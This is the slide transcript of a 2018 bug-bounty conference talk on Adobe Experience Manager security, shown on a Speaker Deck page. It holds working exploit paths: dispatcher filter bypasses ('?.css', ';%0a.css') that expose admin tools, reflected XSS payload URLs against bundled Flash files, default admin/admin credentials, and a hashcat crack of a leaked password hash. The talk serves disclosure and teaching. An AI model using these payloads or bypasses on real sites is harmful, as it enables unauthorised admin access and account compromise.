Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A story of the passive aggressive sysadmin of AEM

Frans Rosén
September 13, 2018
Technology
0
7.9k

A story of the passive aggressive sysadmin of AEM

# By Frans Rosén

Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.

Then came security.

Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.

# About speaker

Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.

Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.

Frans Rosén

September 13, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
850
Story of a RCE on Apple through hot jar swapping
fransrosen
0
970
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
160
A methodology using fuzzing and info disclosure
fransrosen
0
220
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.7k
Web based format injection, dumping memory like it's 99 (or "Please help")
fransrosen
0
68
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.7k

Other Decks in Technology

See All in Technology
Making your applications cross-environment - OSCG 2024 NA
salaboy
0
190
エンジニア人生の拡張性を高める 「探索型キャリア設計」の提案
tenshoku_draft
1
130
Zennのパフォーマンスモニタリングでやっていること
ryosukeigarashi
0
150
SSMRunbook作成の勘所_20241120
koichiotomo
3
160
『Firebase Dynamic Links終了に備える』 FlutterアプリでのAdjust導入とDeeplink最適化
techiro
0
130
TypeScriptの次なる大進化なるか!? 条件型を返り値とする関数の型推論
uhyo
2
1.7k
RubyのWebアプリケーションを50倍速くする方法 / How to Make a Ruby Web Application 50 Times Faster
hogelog
3
950
B2B SaaSから見た最近のC#/.NETの進化
sansantech
PRO
0
890
OCI 運用監視サービス 概要
oracle4engineer
PRO
0
4.8k
個人でもIAM Identity Centerを使おう!(アクセス管理編)
ryder472
4
230
マルチモーダル / AI Agent / LLMOps 3つの技術トレンドで理解するLLMの今後の展望
hirosatogamo
37
12k
Flutterによる 効率的なAndroid・iOS・Webアプリケーション開発の事例
recruitengineers
PRO
0
120

Featured

See All Featured
GitHub's CSS Performance
jonrohan
1030
460k
How to train your dragon (web standard)
notwaldorf
88
5.7k
Bash Introduction
62gerente
608
210k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
31
2.7k
BBQ
matthewcrist
85
9.3k
Become a Pro
speakerdeck
PRO
25
5k
Art, The Web, and Tiny UX
lynnandtonic
297
20k
The Art of Programming - Codeland 2020
erikaheidi
52
13k
Gamification - CAS2011
davidbonilla
80
5k
A better future with KSS
kneath
238
17k
Fashionably flexible responsive web design (full day workshop)
malarkey
405
65k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
26
1.4k

Transcript

  1. @fransrosen A story of the passive aggressive sysadmin of AEM

    or "How to make a talk in 3h 35min"

  2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once

  3. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat

  4. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  5. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957

  6. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest

    RCE."

  7. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  8. @fransrosen How AEM is structured Adobe "black magic glue"

  9. @fransrosen How AEM is structured Stuff you pay your consultants

    for Adobe "black magic glue"

  10. @fransrosen Shit no one’s updating Stuff you pay your consultants

    for Adobe "black magic glue" How AEM is structured

  11. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  12. @fransrosen How AEM is structured Apache HTTP server module

  13. @fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server

    module

  14. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter

  15. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter A bunch of admin-tools

  16. @fransrosen How AEM is structured You should not have access

    to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools

  17. @fransrosen How AEM is structured You should not have access

    to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content

  18. @fransrosen Creating pages

  19. @fransrosen Creating pages Author creates a new page in the

    repo

  20. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes

  21. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes Dispatcher serves the content

  22. @fransrosen Accessing pages

  23. @fransrosen Accessing pages Dispatcher gets the URL

  24. @fransrosen Accessing pages Dispatcher gets the URL Goes through a

    filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  25. @fransrosen Accessing pages Dispatcher gets the URL If all is

    OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  26. @fransrosen CVE-2016-0957 aka "I am two years old but I’m

    inside an enterprise product that no one can or dares to upgrade"

  27. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  28. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  29. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  30. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  31. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  32. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  33. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  34. @fransrosen This is ridiculous

  35. @fransrosen Accessing pages?.css Dispatcher gets the URL?.css

  36. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time

  37. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time Serve from publish node

  38. @fransrosen Publish nodes

  39. @fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs

    + metadata

  40. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  41. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  42. @fransrosen …but there’s more!

  43. @fransrosen CRX Explorer /crx/de/index.jsp?.css

  44. @fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css

  45. @fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css

  46. @fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css

  47. @fransrosen Package Manager /crx/packmgr/index.jsp?.css

  48. @fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css

  49. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  50. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  51. @fransrosen

  52. @fransrosen bin/querybuilder for SWFs!

  53. @fransrosen bin/querybuilder for SWFs!

  54. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  55. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  56. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String

  57. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  58. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  59. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole

  60. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole

  61. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole

  62. @fransrosen Allowing anonymous publish access

  63. @fransrosen Allowing anonymous publish access

  64. @fransrosen Allowing anonymous publish access

  65. @fransrosen but Peter mentioned RCE?

  66. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  67. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin

  68. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  69. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  70. @fransrosen Patch for CVE-2016-0957

  71. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  72. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  73. @fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO!

    WOHO!

  74. @fransrosen Problem 1

  75. @fransrosen Problem 1

  76. @fransrosen Problem 1 PRIORITY: nah, bro

  77. @fransrosen Problem 2

  78. @fransrosen Problem 2

  79. @fransrosen Patch for CVE-2016-0957 IRL VERSION

  80. @fransrosen Patch for CVE-2016-0957 IRL

  81. @fransrosen Patch for CVE-2016-0957 IRL

  82. @fransrosen Patch for CVE-2016-0957 IRL

  83. @fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this

    one

  84. @fransrosen The passive agressive sysadmin

  85. @fransrosen The passive agressive sysadmin + +

  86. @fransrosen The passive agressive sysadmin + +

  87. @fransrosen I’ve seen this before

  88. @fransrosen AEM

  89. @fransrosen CRX

  90. @fransrosen CRXDE

  91. @fransrosen All other stuff

  92. @fransrosen /system/console

  93. @fransrosen /system/console admin / admin

  94. @fransrosen /system/console admin / admin

  95. @fransrosen Report!

  96. @fransrosen Search time!

  97. @fransrosen Search time!

  98. @fransrosen Search time!

  99. @fransrosen Search time!

  100. @fransrosen WTF

  101. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n')

  102. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798

  103. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt

  104. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018

  105. @fransrosen hashcat ftw ih8uall

  106. @fransrosen /system/console

  107. @fransrosen /system/console admin / ih8uall

  108. @fransrosen /system/console

  109. @fransrosen /system/console

  110. @fransrosen Report 2

  111. @fransrosen Report 2

  112. @fransrosen Report 2

  113. @fransrosen Public bug bounty programs with AEM Public responsible disclosure

    Private ones

  114. @fransrosen Thanks!